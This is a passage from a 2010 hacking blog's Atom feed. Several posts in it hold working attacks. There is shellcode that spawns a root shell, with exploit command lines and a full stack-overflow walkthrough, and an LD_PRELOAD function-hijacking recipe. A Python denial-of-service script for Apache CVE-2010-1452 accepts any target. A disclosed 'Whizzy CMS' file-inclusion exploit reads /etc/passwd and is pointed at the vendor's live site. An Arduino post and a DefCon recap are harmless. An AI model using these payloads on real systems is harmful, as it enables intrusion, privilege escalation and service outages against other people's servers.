/&gt;&lt;blockquote&gt;`printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And here is our attack address being repeated:&lt;br /&gt;&lt;blockquote&gt;`perl -e 'print "\x38\xfa\xff\xbf" x 45'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Ok lets run this shit:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF2 `perl -e 'print "\x90" x 200'``printf "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"``perl -e 'print "\x38\xfa\xff\xbf" x 45'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;If your 1337 you should now be at a new shell!! Ok later bitches.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-2939506363781705400?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/2939506363781705400/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/more-buffer-overflows-on-easy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2939506363781705400'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/2939506363781705400'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/09/more-buffer-overflows-on-easy.html' title='More buffer overflows on the easy.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7049747451170719263</id><published>2010-08-24T01:00:00.000-07:00</published><updated>2010-08-25T07:39:35.982-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='first'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='DLL'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='hijacking'/><title type='text'>DLL hijacking in linux</title><content type='html'>The last few days i been seeing lots and lots of buzz about DLL injection on windows, which is cool but i dont use windows so i decided to join the hype wagon and make a stink about it on linux :P "both have existed for a very very long time so i cant really understand all the hype all of a sudon" Anyway linux has stuff like DLL files but its called Shared Objects, so rather then Dynamic Linked Librarys ".dll" we use Shared Objects ".so". &lt;br /&gt;&lt;br /&gt;Now i dont know about windows but in linux this is almost to easy. Almost all apps in linux one time or another call strlen() so all we have to do is hijack that function with our own shared object. Basiclly we are going to rewrite the strlen function and force apps to use our version. Lets look at our hijacking code:&lt;br /&gt;&lt;br /&gt;hijack_strlen.c&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;#include &lt; stdio.h &gt;&lt;br /&gt;#include &lt; string.h &gt;&lt;br /&gt;size_t strlen(const char *str)&lt;br /&gt;{&lt;br /&gt;        printf("\n\nWe have just hijacked strlen() xD\n\n");&lt;br /&gt;        return 5;&lt;br /&gt;}&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now we just have to compile it as a shared object, we do that with these commands:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;gcc -fPIC -c hijack_strlen.c -o hijack_strlen.o&lt;br /&gt;gcc -shared -o hijack_strlen.so hijack_strlen.o&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And now we are ready to start injecting our shared object to hijack strlen(). We will be using the LD_PRELOAD trick to do this. For our target app lets use nmap :D We just run this command:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;LD_PRELOAD=/home/$user/hijack_strlen.so nmap&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;When you run the above we should see something like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We have just hijacked strlen() xD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We have just hijacked strlen() xD&lt;br /&gt;&lt;br /&gt;Nmap 5.00 ( http://nmap.org )&lt;br /&gt;Usage: nmap [Scan Type(s)] [Options] {target specification}&lt;br /&gt;TARGET SPECIFICATION:&lt;br /&gt;...&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And there you have it! We just hijacked strlen in nmap!! We are 1337 :P&lt;br /&gt;&lt;br /&gt;Now that you have your killer hijacker SO try these commands as well:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;LD_PRELOAD=/home/$user/hijack_strlen.so ifconfig&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;LD_PRELOAD=/home/$user/hijack_strlen.so ssh&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;LD_PRELOAD=/home/$user/hijack_strlen.so scp&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And yes there are tons more :D Ok thats all for now, laters.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7049747451170719263?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7049747451170719263/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/dll-hijacking-in-linux.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7049747451170719263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7049747451170719263'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/dll-hijacking-in-linux.html' title='DLL hijacking in linux'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-102976587541655262</id><published>2010-08-17T18:21:00.000-07:00</published><updated>2010-08-19T07:52:07.710-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='release'/><category scheme='http://www.blogger.com/atom/ns#' term='DoS'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='apache'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Apache DoS tool (CVE-2010-1452)</title><content type='html'>I made a little python script to exploit the &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452"&gt;CVE-2010-1452&lt;/a&gt; bug. So...here it is :)&lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://plunder.com/c44551cc2d"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Source code:&lt;br /&gt;apacheDoS-CVE20101452.py&lt;br /&gt;&lt;blockquote&gt;import socket, getopt, sys&lt;br /&gt;try:&lt;br /&gt; opts, args = getopt.getopt(sys.argv[1:], "ht:")&lt;br /&gt;except getopt.GetoptError, err:&lt;br /&gt; print str(err)&lt;br /&gt; exit()&lt;br /&gt;def banner():&lt;br /&gt; print "************************************************"&lt;br /&gt; print "**|''''''''''''''''''''''''''''''''''''''''''|**"&lt;br /&gt; print "**|Apache DoS tool                           |**"&lt;br /&gt; print "**|By: Anarchy Angel                         |**"&lt;br /&gt; print "**|Email: anarchy.ang31 [@] gmail            |**"&lt;br /&gt; print "**|http://hha.zapto.org                      |**"&lt;br /&gt; print "**|-                                         |**"&lt;br /&gt; print "**|Usage:                                    |**"&lt;br /&gt; print "**| $ python apacheDoS-CVE20101452.py -h     |**"&lt;br /&gt; print "**|                                          |**"&lt;br /&gt; print "**|,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,|**"&lt;br /&gt; print "************************************************"&lt;br /&gt; print ""&lt;br /&gt;for o, a in opts:&lt;br /&gt; if o in ("-h", "--help"):&lt;br /&gt;  banner()&lt;br /&gt;  print "-h: This message."&lt;br /&gt;  print "-t &lt;target&gt;: The target server you want to DoS"&lt;br /&gt;  print "i.e. user@user:~/$ python apacheDoS-CVE20101452.py -t www.target.com"&lt;br /&gt;  print "This script uses the CVE-2010-1452 bug to DoS apache servers."&lt;br /&gt;  print "More info: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452"&lt;br /&gt;  exit()&lt;br /&gt; elif o in ("-t", "--target"):&lt;br /&gt;  server = a&lt;br /&gt; else:&lt;br /&gt;  assert False, "unhandled option"&lt;br /&gt;try:&lt;br /&gt; server&lt;br /&gt;except NameError:&lt;br /&gt; print "No mode set."&lt;br /&gt; print "Try -h"&lt;br /&gt; exit()&lt;br /&gt;banner()&lt;br /&gt;print "Starting DoS attack"&lt;br /&gt;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;#now connect to the web server on port 80 &lt;br /&gt;# - the normal http port&lt;br /&gt;s.connect((server, 80))&lt;br /&gt;s.send("GET http://"+server+" HTTP/1.0")&lt;br /&gt;print "Packets sent\nChecking servers status....."&lt;br /&gt;s.close()&lt;br /&gt;f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;try:&lt;br /&gt; f.connect((server, 80))&lt;br /&gt; print "Server not open to DoS :("&lt;br /&gt; f.close()&lt;br /&gt;except:&lt;br /&gt; print "DoS done xD"&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-102976587541655262?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/102976587541655262/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/apache-dos-tool-cve-2010-1452.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/102976587541655262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/102976587541655262'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/apache-dos-tool-cve-2010-1452.html' title='Apache DoS tool (CVE-2010-1452)'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7240716995493352119</id><published>2010-08-16T13:01:00.000-07:00</published><updated>2010-08-16T17:39:34.457-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='arduino'/><category scheme='http://www.blogger.com/atom/ns#' term='first'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='hardware'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Toys for hackers</title><content type='html'>The other day i friend of mine introduced me to &lt;a href="http://www.arduino.cc/"&gt;Arduino&lt;/a&gt;, and i been playing with it ever since xD There is something about coding hardware that is very gratifying. So anyway i got my first toy done and i thought i would share it with you. Heres my leet video of my creation in action:&lt;br /&gt;&lt;br /&gt;&lt;object width="410" height="385"&gt;&lt;param name="movie" value="http://www.youtube.com/v/wnaZ9DmpzsE?fs=1&amp;amp;hl=en_US"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/wnaZ9DmpzsE?fs=1&amp;amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="410" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Here is the source code for my little toy:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;int sensorPin = 0;    &lt;br /&gt;int ledPin = 13;      &lt;br /&gt;int sensorValue = 0;&lt;br /&gt;const int buttonPin = 2;&lt;br /&gt;const int buttonPin2 = 1;&lt;br /&gt;int buttonState = 0;&lt;br /&gt;int buttonState2 = 0;&lt;br /&gt;&lt;br /&gt;void setup() {&lt;br /&gt;  pinMode(buttonPin, INPUT);&lt;br /&gt;  pinMode(ledPin, OUTPUT);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void loop() {&lt;br /&gt;  buttonState = digitalRead(buttonPin);&lt;br /&gt;  buttonState2 = digitalRead(buttonPin2);&lt;br /&gt;  if(buttonState2 == LOW)&lt;br /&gt;  {&lt;br /&gt;    digitalWrite(ledPin, HIGH);&lt;br /&gt;    return;&lt;br /&gt;  }&lt;br /&gt;  if(buttonState == LOW)&lt;br /&gt;  {&lt;br /&gt;    digitalWrite(ledPin, LOW);&lt;br /&gt;  }else{&lt;br /&gt;    digitalWrite(ledPin, HIGH);&lt;br /&gt;    sensorValue = analogRead(sensorPin);&lt;br /&gt;    delay(100);&lt;br /&gt;    digitalWrite(ledPin, LOW);&lt;br /&gt;    delay(sensorValue);&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Isnt it sexy? :P I am looking forward to a long and loving relationship with this and you can expect more to come xD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7240716995493352119?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7240716995493352119/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/toys-for-hackers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7240716995493352119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7240716995493352119'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/toys-for-hackers.html' title='Toys for hackers'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7912330666945519793</id><published>2010-08-12T13:00:00.000-07:00</published><updated>2010-08-12T19:37:28.810-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='documentation'/><category scheme='http://www.blogger.com/atom/ns#' term='bof'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Buffer overflows on the easy.</title><content type='html'>So i started out on a little journey into buffer overflows on ubuntu and i thought i would take you with me :) First things first, we need to setup our environment and we start by opening a terminal and turning address space randomization off like so:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;echo 0 &gt; /proc/sys/kernel/randomize_va_space&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Then we need to turn on core dumps:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;ulimit -c unlimited&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;And now we are ready for our BOF app, here is the source we will be working with:&lt;br /&gt;&lt;br /&gt;BOF.c&lt;br /&gt;&lt;blockquote&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;&lt;br /&gt;int main(int argc, char** argv)&lt;br /&gt;{&lt;br /&gt;        char buffer[10];&lt;br /&gt;        strcpy(buffer, argv[1]);&lt;br /&gt;        printf("sent to buffer: %s \n", buffer);&lt;br /&gt;        return 0;&lt;br /&gt;}&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Compile it with this string:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;gcc -z execstack -g -o BOF -fno-stack-protector -mpreferred-stack-boundary=2 BOF.c&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;So all our program does is take what ever char string we pass to it, put it in a buffer and echo it back. Let try it out:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF AAAA&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Cool huh? Lets try to pass 14 "A"s to it and see what happens:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF `perl -e 'print "A" x 14'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Run that and you should see something like this returned:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Segmentation fault (core dumped)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Ok so now we have a core dump we can work with. Lets load it up:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;gdb -c core ./BOF&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Once at a prompt type "i r" and hit enter and you should see something like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;eax            0x0 0&lt;br /&gt;ecx            0xbffff3dc -1073744932&lt;br /&gt;edx            0x414140fd 1094795517&lt;br /&gt;ebx            0x287ff4 2654196&lt;br /&gt;esp            0xbffff40c 0xbffff40c&lt;br /&gt;ebp            0x41414141 0x41414141&lt;br /&gt;esi            0x0 0&lt;br /&gt;edi            0x0 0&lt;br /&gt;eip            0x171286 0x171286 &lt;_setjmp+6&gt;&lt;br /&gt;eflags         0x10246 [ PF ZF IF RF ]&lt;br /&gt;cs             0x73 115&lt;br /&gt;ss             0x7b 123&lt;br /&gt;ds             0x7b 123&lt;br /&gt;es             0x7b 123&lt;br /&gt;fs             0x0 0&lt;br /&gt;gs             0x33 51&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Ok so we see we filled ebp up with 41's which is A in hex but our goal is to take over the eip pointer, so lets exit gdb and put a few more As in there.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF `perl -e 'print "A" x 15'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now when we open gdb and run "i r" we get this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;eax            0x0 0&lt;br /&gt;ecx            0xbffff3cc -1073744948&lt;br /&gt;edx            0x289340 2659136&lt;br /&gt;ebx            0x287ff4 2654196&lt;br /&gt;esp            0xbffff400 0xbffff400&lt;br /&gt;ebp            0x41414141 0x41414141&lt;br /&gt;esi            0x0 0&lt;br /&gt;edi            0x0 0&lt;br /&gt;eip            0x150041 0x150041&lt;br /&gt;eflags         0x10296 [ PF AF SF IF RF ]&lt;br /&gt;cs             0x73 115&lt;br /&gt;ss             0x7b 123&lt;br /&gt;ds             0x7b 123&lt;br /&gt;es             0x7b 123&lt;br /&gt;fs             0x0 0&lt;br /&gt;gs             0x33 51&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;There we see we got one A into eip. So now we know that 14 "A"s will fill the stack up to eip so in all our string will be 18 chars long, 14 to fill up the stack, and 4 to take over eip. Now we just need something to put there, and i have just the thing:&lt;br /&gt;&lt;br /&gt;eggshell.c&lt;br /&gt;&lt;blockquote&gt;#include &lt;stdio.h&gt; //dont forget brackets again&lt;br /&gt;#define NOP 0x90 /* nops , we want to land here */&lt;br /&gt;&lt;br /&gt;char shellcode[] =&lt;br /&gt;  "\x6a\x17"                      // push $0x17&lt;br /&gt;  "\x58"                        // pop  %eax&lt;br /&gt;  "\x31\xdb"                    // xor  %ebx, %ebx&lt;br /&gt;  "\xcd\x80"                    // int  $0x80&lt;br /&gt;&lt;br /&gt;  "\x31\xd2"                    // xor  %edx, %edx  &lt;br /&gt;  "\x6a\x0b"                    // push $0xb&lt;br /&gt;  "\x58"                        // pop  %eax&lt;br /&gt;  "\x52"                        // push %edx&lt;br /&gt;  "\x68\x2f\x2f\x73\x68"        // push $0x68732f2f&lt;br /&gt;  "\x68\x2f\x62\x69\x6e"        // push $0x6e69622f&lt;br /&gt;  "\x89\xe3"                    // mov  %esp, %ebx&lt;br /&gt;  "\x52"                        // push %edx&lt;br /&gt;  "\x53"                        // push %ebx&lt;br /&gt;  "\x89\xe1"                    // mov  %esp, %ecx&lt;br /&gt;  "\xcd\x80";                   // int  $0x80&lt;br /&gt;&lt;br /&gt;/* This is not my shell code , I got it from milw0rm.com.&lt;br /&gt;Its  setuid(0) + execve("/bin/sh", ["/bin/sh", NULL])&lt;br /&gt;http://www.milw0rm.com/shellcode/1637&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;int main(void)&lt;br /&gt;{&lt;br /&gt;char egg[512];&lt;br /&gt;puts("loaded eggshell into env");&lt;br /&gt;memset(egg,NOP,512);&lt;br /&gt;memcpy(&amp;egg[512-strlen(shellcode)],shellcode,strlen(shellcode));&lt;br /&gt;setenv("EGG", egg, 1);&lt;br /&gt;putenv(egg);&lt;br /&gt;system("/bin/bash");&lt;br /&gt;return(0);&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now just compile that and run it to get it into memory. The main benefit with the method of pushing the shell code into a environment variable is that when dealing with small buffers we dont have to try to cram it all into it because its already in the memory at another location, more on that later. Now we need to make BOF seg fault again:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF `perl -e 'print "A" x 18'`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now open gdb so we can find out what address our egg shell was loaded to, we do that with this command:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;x/s $esp&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now just hit enter until you see something like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;0xbffff51c:  "EGG=\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\"&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;So now we have the address that our shell code was loaded to "0xbffff51c", all thats left is to chop off the leading 0x, reverse its order, and put it in hex formate giving us this "\x1c\xf5\xff\xbf", and push it into eip. So our BOF string will look like this:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;./BOF `perl -e 'print "A" x 14'``printf "\x1c\xf5\xff\xbf"`&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;After running that you should be at a new shell xD There you have it, a BOF from start to finish.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7912330666945519793?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7912330666945519793/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/buffer-overflows-on-easy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7912330666945519793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7912330666945519793'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/buffer-overflows-on-easy.html' title='Buffer overflows on the easy.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-7908295708727589546</id><published>2010-08-04T14:03:00.000-07:00</published><updated>2010-08-04T17:27:23.585-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='plunder'/><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='documentation'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='cons'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>DefCon18 is over.</title><content type='html'>Well i had a great time at DefCon18!! One of the more exciting things this year was badge unlocking which i totally fucked up :( i thought you needed a usb cable to crack the code but after closer inspection of the source i see that usb had nothing to do with it :( Note i didnt take the time really till after i got home to look at the source. Once i found out all the ninja badges were gone i kinda lost the urge to hack it. So anyway &lt;a href="http://www.plunder.com/DefCon18-full-CD-download-6526e84c3c.htm"&gt;here&lt;/a&gt; is all the content of the DefCon18 CD. Oh yeah, and im back :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-7908295708727589546?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/7908295708727589546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/defcon18-is-over.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7908295708727589546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/7908295708727589546'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/08/defcon18-is-over.html' title='DefCon18 is over.'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-4093439758975759763</id><published>2010-07-29T06:00:00.000-07:00</published><updated>2010-07-29T06:05:20.444-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fun'/><category scheme='http://www.blogger.com/atom/ns#' term='injection'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Whizzy CMS 10.02 0-day</title><content type='html'>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;[x] Type: Local File Inclusion&lt;br /&gt;[x] Vendor: Unverse.net&lt;br /&gt;[x] Script Name: Whizzy CMS&lt;br /&gt;[x] Script version: 10.02&lt;br /&gt;[x] Author: Anarchy Angel&lt;br /&gt;[x] Mail : anarchy[dot]ang31@gmail[dot]com&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;http://site.org/?[LFI]&lt;br /&gt; &lt;br /&gt;Ex:&lt;br /&gt;http://site.org/?../../../../../../../etc/passwd&lt;br /&gt; &lt;br /&gt;PoC on live demo:&lt;br /&gt;http://www.unverse.net/?../../../../../../../../../../../../etc/passwd&lt;br /&gt; &lt;br /&gt;This is a special DefCon 18 kick off from me! See ya there ;)&lt;br /&gt; &lt;br /&gt;Special Tnx : lun0s, proge, sToRm, progenic, gny&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7699735801453301458-4093439758975759763?l=ssolutionx.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ssolutionx.blogspot.com/feeds/4093439758975759763/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/whizzy-cms-1002-0-day.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4093439758975759763'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7699735801453301458/posts/default/4093439758975759763'/><link rel='alternate' type='text/html' href='http://ssolutionx.blogspot.com/2010/07/whizzy-cms-1002-0-day.html' title='Whizzy CMS 10.02 0-day'/><author><name>AA</name><uri>http://www.blogger.com/profile/00951225052408238640</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7699735801453301458.post-3680523399151995219</id><published>2010-07-28T07:00:00.000-07:00</published><updated>2010-07-28T07:29:14.993-07:00</updated><category 